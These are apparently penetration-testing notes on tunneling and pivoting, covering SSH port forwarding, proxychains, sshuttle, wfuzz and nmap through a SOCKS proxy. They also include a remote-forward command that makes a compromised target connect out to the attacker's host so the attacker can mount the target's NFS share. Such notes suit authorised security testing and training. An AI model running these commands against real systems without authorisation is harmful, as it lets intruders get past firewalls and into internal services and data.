Tunneling and Pivoting Techniques (GIAC): https://www.giac.org/paper/gwapt/4686/tunneling-pivoting-web-application-penetration-testing/120229
The SSH server redirects data from a specified port (which is local to the host running the SSH client e.g. Kali/attacker) through a secure tunnel to a specified destination host and port. This sometimes allows bypass of firewall rules.
Have shell access -> enum'd a new port/service via. netstat but can't access it from within the target / blocked?
$ ssh -L [local_port]:[target/jumpbox]:[blocked_port] [user]@[target]
# example - bypass blocked HTTP service on port 80
$ ssh -L 80:192.168.218.99:80 [email protected]
This will allow you to access internal network services on dynamic (as opposed to static) ports.
Proxychains
- Ensure
/etc/proxychains4.confis setup with the preferred port (deafult is9050). - Establish SSH tunnel with proxy server
$ kali> sudo ssh -N -D 127.0.0.1:9050 username@proxy_server/jump_box - Run commands
$ proxychains curl http://[internal_target]
Sshuttle
$ sshuttle user@[proxy_server] [internal_cidr]
$ sshuttle [email protected] 10.1.1.0/24
Directory brute-force example
- Wfuzz works well, Gobuster requires some setup.
$ wfuzz -p 127.0.0.1:9050:SOCKS4 -c -w [/path/to/wordlist] --hc=404 http://[internal_target]/FUZ
Proxychains examples
$ proxychains nmap -Pn -sT -sV [target] # nmap internal scan
$ proxychains curl http://localhost/exec.php # request internal web server
SSH remote port forwarding is for opening a connection from within the target -> Kali.
- Can bypass inbound firewall restrictions to SSH (as outbound connection is used).
- Can be used to access a target's localhost services from Kali (see NFS below)
# Mount a target's localhost NFS share
$ target> ssh -N -R [kali]:2049:127.0.0.1:2049 kali@[kali_ip]
$ kali> mount -t nfs 127.0.0.1:/ /mnt -o nolock